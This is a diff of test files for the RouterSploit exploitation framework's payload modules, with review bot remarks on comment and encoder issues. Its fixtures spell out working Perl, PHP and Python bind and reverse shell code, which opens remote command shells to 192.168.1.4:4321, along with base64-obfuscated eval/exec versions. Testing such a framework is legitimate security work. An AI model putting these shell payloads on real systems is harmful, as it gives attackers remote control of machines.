payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.generate() == bind_tcp
......
from routersploit.modules.payloads.mipsbe.reverse_tcp import Exploit from routersploit.modules.payloads.mipsbe.reverse_tcp import Payload
# mipsbe reverse tcp with lhost=192.168.1.4 lport=4321 # mipsbe reverse tcp with lhost=192.168.1.4 lport=4321
...@@ -46,7 +46,7 @@ elf_mipsbe_reverse_tcp = ( ...@@ -46,7 +46,7 @@ elf_mipsbe_reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
......
from routersploit.modules.payloads.mipsle.bind_tcp import Exploit from routersploit.modules.payloads.mipsle.bind_tcp import Payload
# mipsle bind tcp payload with rport=4321 # mipsle bind tcp payload with rport=4321
...@@ -51,7 +51,7 @@ elf_mipsle_bind_tcp = ( ...@@ -51,7 +51,7 @@ elf_mipsle_bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.generate() == bind_tcp
......
from routersploit.modules.payloads.mipsle.reverse_tcp import Exploit from routersploit.modules.payloads.mipsle.reverse_tcp import Payload
# mipsle reverse tcp with lhost=192.168.1.4 lport=4321 # mipsle reverse tcp with lhost=192.168.1.4 lport=4321
...@@ -46,7 +46,7 @@ elf_mipsle_reverse_tcp = ( ...@@ -46,7 +46,7 @@ elf_mipsle_reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
......
from routersploit.modules.payloads.perl.bind_tcp import Exploit from routersploit.modules.payloads.perl.bind_tcp import Payload
# perl bind tcp payload with rport=4321 # perl bind tcp payload with rport=4321
bind_tcp = ( bind_tcp = (
"use IO;foreach my $key(keys %ENV){" +
"if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort," +
"4321" +
",Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){" +
"if($_=~ /(.*)/){system $1;}};"
)
# perl bind tcp payload with rport=4321 encoded with perl/base64
bind_tcp_encoded = (
"use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs='));" "use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKExvY2FsUG9ydCw0MzIxLFJldXNlLDEsTGlzdGVuKS0+YWNjZXB0OyR+LT5mZG9wZW4oJGMsdyk7U1RESU4tPmZkb3BlbigkYyxyKTt3aGlsZSg8Pil7aWYoJF89fiAvKC4qKS8pe3N5c3RlbSAkMTt9fTs='));"
) )
...@@ -10,7 +19,8 @@ bind_tcp = ( ...@@ -10,7 +19,8 @@ bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.generate() == bind_tcp
assert payload.run() == bind_tcp_encoded
from routersploit.modules.payloads.perl.reverse_tcp import Exploit from routersploit.modules.payloads.perl.reverse_tcp import Payload
# reverse udp payload with lhost=192.168.1.4 lport=4321 # reverse udp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = ( reverse_tcp = (
"use IO;foreach my $key(keys %ENV){" +
"if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,\"" +
"192.168.1.4:4321" +
"\");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};"
)
# reverse udp payload with lhost=192.168.1.4 lport=4321 encoded with perl/base64
reverse_tcp_encoded = (
"use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjEuNDo0MzIxIik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Ow=='));" "use MIME::Base64;eval(decode_base64('dXNlIElPO2ZvcmVhY2ggbXkgJGtleShrZXlzICVFTlYpe2lmKCRFTlZ7JGtleX09fi8oLiopLyl7JEVOVnska2V5fT0kMTt9fSRjPW5ldyBJTzo6U29ja2V0OjpJTkVUKFBlZXJBZGRyLCIxOTIuMTY4LjEuNDo0MzIxIik7U1RESU4tPmZkb3BlbigkYyxyKTskfi0+ZmRvcGVuKCRjLHcpO3doaWxlKDw+KXtpZigkXz1+IC8oLiopLyl7c3lzdGVtICQxO319Ow=='));"
) )
...@@ -10,8 +18,9 @@ reverse_tcp = ( ...@@ -10,8 +18,9 @@ reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_tcp assert payload.generate() == reverse_tcp
assert payload.run() == reverse_tcp_encoded
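Review bot: The new comment `# reverse udp payload with lhost=192.168.1.4 lport=4321 encoded with perl/base64` describes a UDP payload, but this file tests perl/reverse_tcp and the fixture is the TCP connect; it should read `# perl reverse tcp payload with lhost=192.168.1.4 lport=4321 encoded with perl/base64`, and the pre-existing `# reverse udp payload with lhost=…` comment above the plain fixture has the same mistake. run(), the method the new assertion exercises, is defined outside this file.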
from routersploit.modules.payloads.php.bind_tcp import Exploit from routersploit.modules.payloads.php.bind_tcp import Payload
# php bind tcp payload with rport=4321 # php bind tcp payload with rport 4321
bind_tcp = ( bind_tcp = (
"$s=socket_create(AF_INET,SOCK_STREAM,SOL_TCP);" +
"socket_bind($s,\"0.0.0.0\",4321);" +
"socket_listen($s,1);" +
"$cl=socket_accept($s);" +
"while(1){" +
"if(!socket_write($cl,\"$ \",2))exit;" +
"$in=socket_read($cl,100);" +
"$cmd=popen(\"$in\",\"r\");" +
"while(!feof($cmd)){" +
"$m=fgetc($cmd);" +
"socket_write($cl,$m,strlen($m));" +
"}}"
)
# php bind tcp payload with rport=4321 encoded with php/base64
bind_tcp_encoded = (
"eval(base64_decode('JHM9c29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApO3NvY2tldF9iaW5kKCRzLCIwLjAuMC4wIiw0MzIxKTtzb2NrZXRfbGlzdGVuKCRzLDEpOyRjbD1zb2NrZXRfYWNjZXB0KCRzKTt3aGlsZSgxKXtpZighc29ja2V0X3dyaXRlKCRjbCwiJCAiLDIpKWV4aXQ7JGluPXNvY2tldF9yZWFkKCRjbCwxMDApOyRjbWQ9cG9wZW4oIiRpbiIsInIiKTt3aGlsZSghZmVvZigkY21kKSl7JG09ZmdldGMoJGNtZCk7c29ja2V0X3dyaXRlKCRjbCwkbSxzdHJsZW4oJG0pKTt9fQ=='));" "eval(base64_decode('JHM9c29ja2V0X2NyZWF0ZShBRl9JTkVULFNPQ0tfU1RSRUFNLFNPTF9UQ1ApO3NvY2tldF9iaW5kKCRzLCIwLjAuMC4wIiw0MzIxKTtzb2NrZXRfbGlzdGVuKCRzLDEpOyRjbD1zb2NrZXRfYWNjZXB0KCRzKTt3aGlsZSgxKXtpZighc29ja2V0X3dyaXRlKCRjbCwiJCAiLDIpKWV4aXQ7JGluPXNvY2tldF9yZWFkKCRjbCwxMDApOyRjbWQ9cG9wZW4oIiRpbiIsInIiKTt3aGlsZSghZmVvZigkY21kKSl7JG09ZmdldGMoJGNtZCk7c29ja2V0X3dyaXRlKCRjbCwkbSxzdHJsZW4oJG0pKTt9fQ=='));"
) )
...@@ -10,7 +26,8 @@ bind_tcp = ( ...@@ -10,7 +26,8 @@ bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.generate() == bind_tcp
assert payload.run() == bind_tcp_encoded
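Review bot: `assert payload.run() == bind_tcp_encoded` depends on whichever encoder the payload selects by default, which this hunk does not show, so a later change to that default would silently turn this into a different test; the test should pick the encoder explicitly before calling `run()` (the attribute is not visible here — presumably something like `payload.encoder`, confirm against the Payload class). The golden `bind_tcp_encoded` literal is also opaque as written: a comment tying it to the plaintext, e.g. `# bind_tcp above, base64-encoded and wrapped in the php/base64 encoder's eval(base64_decode(...)) stub`, or deriving it with `base64.b64encode(bind_tcp.encode()).decode()` would let a reader verify the expectation instead of trusting the string. The same two points apply to the php reverse_tcp, python bind_tcp, bind_udp, reverse_tcp and reverse_udp sections that follow.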
from routersploit.modules.payloads.php.reverse_tcp import Exploit from routersploit.modules.payloads.php.reverse_tcp import Payload
# php reverse tcp payload with lhost=192.168.1.4 lport=4321 # php reverse tcp payload with lhost=192.168.1.4 lport=4321
reverse_tcp = ( reverse_tcp = (
"$s=fsockopen(\"tcp://192.168.1.4\",4321);" +
"while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}"
)
# php reverse tcp payload with lhost=192.168.1.4 lport=4321 encoded with php/base64
reverse_tcp_encoded = (
"eval(base64_decode('JHM9ZnNvY2tvcGVuKCJ0Y3A6Ly8xOTIuMTY4LjEuNCIsNDMyMSk7d2hpbGUoIWZlb2YoJHMpKXtleGVjKGZnZXRzKCRzKSwkbyk7JG89aW1wbG9kZSgiXG4iLCRvKTskby49IlxuIjtmcHV0cygkcywkbyk7fQ=='));" "eval(base64_decode('JHM9ZnNvY2tvcGVuKCJ0Y3A6Ly8xOTIuMTY4LjEuNCIsNDMyMSk7d2hpbGUoIWZlb2YoJHMpKXtleGVjKGZnZXRzKCRzKSwkbyk7JG89aW1wbG9kZSgiXG4iLCRvKTskby49IlxuIjtmcHV0cygkcywkbyk7fQ=='));"
) )
...@@ -10,8 +17,9 @@ reverse_tcp = ( ...@@ -10,8 +17,9 @@ reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_tcp assert payload.generate() == reverse_tcp
assert payload.run() == reverse_tcp_encoded
from routersploit.modules.payloads.python.bind_tcp import Exploit from routersploit.modules.payloads.python.bind_tcp import Payload
# python bind tcp payload with rport=4321 # python bind tcp payload with rport=4321
bind_tcp = ( bind_tcp = (
"import socket,os\n" +
"so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" +
"so.bind(('0.0.0.0',4321))\n" +
"so.listen(1)\n" +
"so,addr=so.accept()\n" +
"x=False\n" +
"while not x:\n" +
"\tdata=so.recv(1024)\n" +
"\tstdin,stdout,stderr,=os.popen3(data)\n" +
"\tstdout_value=stdout.read()+stderr.read()\n" +
"\tso.send(stdout_value)\n"
)
# python bind tcp payload with rport=4321 encoded with python/base64
bind_tcp_encoded = (
"exec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uYmluZCgoJzAuMC4wLjAnLDQzMjEpKQpzby5saXN0ZW4oMSkKc28sYWRkcj1zby5hY2NlcHQoKQp4PUZhbHNlCndoaWxlIG5vdCB4OgoJZGF0YT1zby5yZWN2KDEwMjQpCglzdGRpbixzdGRvdXQsc3RkZXJyLD1vcy5wb3BlbjMoZGF0YSkKCXN0ZG91dF92YWx1ZT1zdGRvdXQucmVhZCgpK3N0ZGVyci5yZWFkKCkKCXNvLnNlbmQoc3Rkb3V0X3ZhbHVlKQo='.decode('base64'))" "exec('aW1wb3J0IHNvY2tldCxvcwpzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uYmluZCgoJzAuMC4wLjAnLDQzMjEpKQpzby5saXN0ZW4oMSkKc28sYWRkcj1zby5hY2NlcHQoKQp4PUZhbHNlCndoaWxlIG5vdCB4OgoJZGF0YT1zby5yZWN2KDEwMjQpCglzdGRpbixzdGRvdXQsc3RkZXJyLD1vcy5wb3BlbjMoZGF0YSkKCXN0ZG91dF92YWx1ZT1zdGRvdXQucmVhZCgpK3N0ZGVyci5yZWFkKCkKCXNvLnNlbmQoc3Rkb3V0X3ZhbHVlKQo='.decode('base64'))"
) )
...@@ -10,7 +25,8 @@ bind_tcp = ( ...@@ -10,7 +25,8 @@ bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.generate() == bind_tcp
assert payload.run() == bind_tcp_encoded
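Review bot: The pinned expectation `exec('...'.decode('base64'))` is Python 2 specific — `str.decode` with the `base64` codec does not exist on Python 3 — so the golden value fixes the python/base64 encoder to a Python-2-only decoder stub without saying so. A comment next to `bind_tcp_encoded` such as `# python/base64 encoder output is Python 2 only (str.decode('base64'))` would make that assumption explicit for whoever updates the encoder or the test later. The same applies to the python bind_udp, reverse_tcp and reverse_udp sections that follow.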
from routersploit.modules.payloads.python.bind_udp import Exploit from routersploit.modules.payloads.python.bind_udp import Payload
# python bind udp payload with rport=4321 # python bind udp payload with rport=4321
bind_udp = ( bind_udp = (
"from subprocess import Popen,PIPE\n" +
"from socket import socket, AF_INET, SOCK_DGRAM\n" +
"s=socket(AF_INET,SOCK_DGRAM)\n" +
"s.bind(('0.0.0.0',4321))\n" +
"while 1:\n"
"\tdata,addr=s.recvfrom(1024)\n" +
"\tout=Popen(data,shell=True,stdout=PIPE,stderr=PIPE).communicate()\n" +
"\ts.sendto(''.join([out[0],out[1]]),addr)\n"
)
# python bind udp payload with rport=4321 encoded with python/base64
bind_udp_encoded = (
"exec('ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbixQSVBFCmZyb20gc29ja2V0IGltcG9ydCBzb2NrZXQsIEFGX0lORVQsIFNPQ0tfREdSQU0Kcz1zb2NrZXQoQUZfSU5FVCxTT0NLX0RHUkFNKQpzLmJpbmQoKCcwLjAuMC4wJyw0MzIxKSkKd2hpbGUgMToKCWRhdGEsYWRkcj1zLnJlY3Zmcm9tKDEwMjQpCglvdXQ9UG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1QSVBFLHN0ZGVycj1QSVBFKS5jb21tdW5pY2F0ZSgpCglzLnNlbmR0bygnJy5qb2luKFtvdXRbMF0sb3V0WzFdXSksYWRkcikK'.decode('base64'))" "exec('ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbixQSVBFCmZyb20gc29ja2V0IGltcG9ydCBzb2NrZXQsIEFGX0lORVQsIFNPQ0tfREdSQU0Kcz1zb2NrZXQoQUZfSU5FVCxTT0NLX0RHUkFNKQpzLmJpbmQoKCcwLjAuMC4wJyw0MzIxKSkKd2hpbGUgMToKCWRhdGEsYWRkcj1zLnJlY3Zmcm9tKDEwMjQpCglvdXQ9UG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1QSVBFLHN0ZGVycj1QSVBFKS5jb21tdW5pY2F0ZSgpCglzLnNlbmR0bygnJy5qb2luKFtvdXRbMF0sb3V0WzFdXSksYWRkcikK'.decode('base64'))"
) )
...@@ -10,7 +22,8 @@ bind_udp = ( ...@@ -10,7 +22,8 @@ bind_udp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_udp assert payload.generate() == bind_udp
assert payload.run() == bind_udp_encoded
from routersploit.modules.payloads.python.reverse_tcp import Exploit from routersploit.modules.payloads.python.reverse_tcp import Payload
# python reverse tcp payload with lhost=192.168.1.4 lport=4321 # python reverse tcp payload with lhost=192.168.1.4 lport 4321
reverse_tcp = ( reverse_tcp = (
"import socket,subprocess,os\n" +
"s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" +
"s.connect(('192.168.1.4',4321))\n" +
"os.dup2(s.fileno(),0)\n" +
"os.dup2(s.fileno(),1)\n" +
"os.dup2(s.fileno(),2)\n" +
"p=subprocess.call([\"/bin/sh\",\"-i\"])"
)
# python reverse tcp payload with lhost=192.168.1.4 lport=4321 encoded with python/base64
reverse_tcp_encoded = (
"exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoJzE5Mi4xNjguMS40Jyw0MzIxKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpvcy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='.decode('base64'))" "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoJzE5Mi4xNjguMS40Jyw0MzIxKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpvcy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='.decode('base64'))"
) )
...@@ -10,8 +21,9 @@ reverse_tcp = ( ...@@ -10,8 +21,9 @@ reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_tcp assert payload.generate() == reverse_tcp
assert payload.run() == reverse_tcp_encoded
from routersploit.modules.payloads.python.reverse_udp import Exploit from routersploit.modules.payloads.python.reverse_udp import Payload
# python reverse udp payload with lhost=192.168.1.4 lport=4321 # python reverse udp payload with lhost=192.168.1.4 lport=4321
reverse_udp = ( reverse_udp = (
"import os\n" +
"import pty\n" +
"import socket\n" +
"s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n" +
"s.connect(('192.168.1.4',4321))\n" +
"os.dup2(s.fileno(), 0)\n" +
"os.dup2(s.fileno(), 1)\n" +
"os.dup2(s.fileno(), 2)\n" +
"pty.spawn('/bin/sh');\n" +
"s.close()\n"
)
# python reverse udp payload with lhost=192.168.1.4 lport=4321 encoded with python/base64
reverse_udp_encoded = (
"exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuNCcsNDMyMSkpCm9zLmR1cDIocy5maWxlbm8oKSwgMCkKb3MuZHVwMihzLmZpbGVubygpLCAxKQpvcy5kdXAyKHMuZmlsZW5vKCksIDIpCnB0eS5zcGF3bignL2Jpbi9zaCcpOwpzLmNsb3NlKCkK'.decode('base64'))" "exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuNCcsNDMyMSkpCm9zLmR1cDIocy5maWxlbm8oKSwgMCkKb3MuZHVwMihzLmZpbGVubygpLCAxKQpvcy5kdXAyKHMuZmlsZW5vKCksIDIpCnB0eS5zcGF3bignL2Jpbi9zaCcpOwpzLmNsb3NlKCkK'.decode('base64'))"
) )
...@@ -10,8 +24,9 @@ reverse_udp = ( ...@@ -10,8 +24,9 @@ reverse_udp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
assert payload.generate() == reverse_udp assert payload.generate() == reverse_udp
assert payload.run() == reverse_udp_encoded
from routersploit.modules.payloads.x64.bind_tcp import Exploit from routersploit.modules.payloads.x64.bind_tcp import Payload
# bind tcp payload with rport=4321 # bind tcp payload with rport=4321
...@@ -33,7 +33,7 @@ elf_x64_bind_tcp = ( ...@@ -33,7 +33,7 @@ elf_x64_bind_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.generate() == bind_tcp
from routersploit.modules.payloads.x64.reverse_tcp import Exploit from routersploit.modules.payloads.x64.reverse_tcp import Payload
# reverse tcp with lhost=192.168.1.4 lport=4321 # reverse tcp with lhost=192.168.1.4 lport=4321
...@@ -31,7 +31,7 @@ elf_x64_reverse_tcp = ( ...@@ -31,7 +31,7 @@ elf_x64_reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
from routersploit.modules.payloads.x86.bind_tcp import Exploit from routersploit.modules.payloads.x86.bind_tcp import Payload
# bind tcp payload with rport=4321 # bind tcp payload with rport=4321
...@@ -30,7 +30,7 @@ elf_x86_reverse_tcp = ( ...@@ -30,7 +30,7 @@ elf_x86_reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.rport = 4321 payload.rport = 4321
assert payload.generate() == bind_tcp assert payload.generate() == bind_tcp
from routersploit.modules.payloads.x86.reverse_tcp import Exploit from routersploit.modules.payloads.x86.reverse_tcp import Payload
# reverse tcp with lhost=192.168.1.4 lport=4321 # reverse tcp with lhost=192.168.1.4 lport=4321
...@@ -29,7 +29,7 @@ elf_x86_reverse_tcp = ( ...@@ -29,7 +29,7 @@ elf_x86_reverse_tcp = (
def test_payload_generation(): def test_payload_generation():
""" Test scenario - payload generation """ """ Test scenario - payload generation """
payload = Exploit() payload = Payload()
payload.lhost = "192.168.1.4" payload.lhost = "192.168.1.4"
payload.lport = 4321 payload.lport = 4321
...@@ -64,7 +64,23 @@ def test_scanner_info(scanner): ...@@ -64,7 +64,23 @@ def test_scanner_info(scanner):
@pytest.mark.parametrize("payload", iter_modules("./routersploit/modules/payloads")) @pytest.mark.parametrize("payload", iter_modules("./routersploit/modules/payloads"))
def test_payload_info(payload): def test_payload_info(payload):
info = payload._Exploit__info__ info = payload._Payload__info__
assert isinstance(info, dict)
assert "name" in info
assert isinstance(info["name"], str)
assert "description" in info
assert isinstance(info["description"], str)
assert "authors" in info
assert isinstance(info["authors"], tuple)
@pytest.mark.parametrize("encoder", iter_modules("./routersploit/modules/encoders"))
def test_encoder_info(encoder):
info = encoder._Encoder__info__
assert isinstance(info, dict) assert isinstance(info, dict)